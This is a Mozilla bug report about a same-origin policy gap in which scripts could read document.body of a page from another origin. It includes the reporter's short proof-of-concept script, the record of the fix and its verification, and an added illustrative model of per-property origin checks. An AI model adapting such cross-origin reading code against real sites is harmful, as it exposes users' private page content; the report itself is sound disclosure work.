[DOGFOOD] Reading documents using document.body

VERIFIED FIXED in M12

Status

P3
normal
VERIFIED FIXED
19 years ago
19 years ago

People

(Reporter: joro, Assigned: norrisboyd)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [PDT+], URL)

(Reporter)

Description

19 years ago
document.body seems not to be protected by "Same origin" security policy.
This leads to at least reading arbitrary documents.
The code is:
----------------------------------------
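<SCRIPT>
// Recursively concatenate the nodeValue of a node and of all its descendants.
function f(o)
{
  var s = '';
  var i;
  s = o.nodeValue;
  if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
      s += f(o.childNodes[i]);
  return s;
}
// Open a document from another origin, then read its body once it has had time to load.
a=window.open("http://www.yahoo.com");
setTimeout("alert(f(a.document.body))",10000);
</SCRIPT>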
----------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
Summary: Reading documents using document.body → [Dogfood] Reading documents using document.body
(Assignee)

Comment 1

19 years ago
Marking dogfood for analysis by PDT at jar's request.
(Assignee)

Updated

19 years ago
Summary: [Dogfood] Reading documents using document.body → [DOGFOOD] Reading documents using document.body

Updated

19 years ago
Whiteboard: [PDT+]

Comment 2

19 years ago
Putting on PDT+ radar.
(Assignee)

Updated

19 years ago
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Updated

19 years ago
Target Milestone: M12

Comment 3

19 years ago
Putting on M12 radar since fixed during this time.

Updated

19 years ago
Status: RESOLVED → VERIFIED

Comment 4

19 years ago
Windows NT (1999112908) Com:
Javascript Error: access disallowed from scripts at
http://www.nat.bg/~joro/mozilla/body1.html to documents at another domain
URL: http://www.nat.bg/~joro/mozilla/body1.html
LineNo: 16

Javascript Error: uncaught exception: [Exception... "Security error" code:
"1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location:
"http://www.nat.bg/~joro/mozilla/body1.html Line: 16"]
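
The difference between the reported behaviour and the verified one, as an added example that is not part of the bug report and is not Mozilla's code. It is a simplified model: the per-property check list, the `guard` and `tryRead` helpers, and the sample document and URLs are constructed assumptions used to show how one unchecked property such as `body` exposes a whole document, and why a check in front of every property read does not have that gap.

```javascript
// Simplified model for illustration; not browser internals.
class SecurityError extends Error {}

// Same origin: scheme, host and port all match (URL.origin combines the three).
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// checkedProps = array: only the listed properties are checked (assumed failure
// mode: anything missing from the list, e.g. body, stays readable cross-origin).
// checkedProps = null: default deny, one check in front of every property read.
function guard(doc, callerUrl, checkedProps) {
  return new Proxy(doc, {
    get(target, prop) {
      const checked = checkedProps === null || checkedProps.includes(prop);
      if (checked && !sameOrigin(callerUrl, target.URL))
        throw new SecurityError(
          `access disallowed from scripts at ${callerUrl} to documents at ${target.URL}`);
      return target[prop];
    },
  });
}

// Concatenate the text of a node tree, as the walker in the report does.
function collectText(node) {
  let s = node.nodeValue || "";
  for (const child of node.childNodes || []) s += collectText(child);
  return s;
}

// Constructed sample document and calling page.
const foreignDoc = {
  URL: "http://other.example/",
  title: "sample",
  body: { nodeValue: null, childNodes: [{ nodeValue: "private text", childNodes: [] }] },
};
const caller = "http://page.example/test.html";

// Returns the text that was read, or "blocked" if the guard refused the access.
function tryRead(guardedDoc) {
  try { return collectText(guardedDoc.body); }
  catch (e) { if (e instanceof SecurityError) return "blocked"; throw e; }
}
```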

Comment 5

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General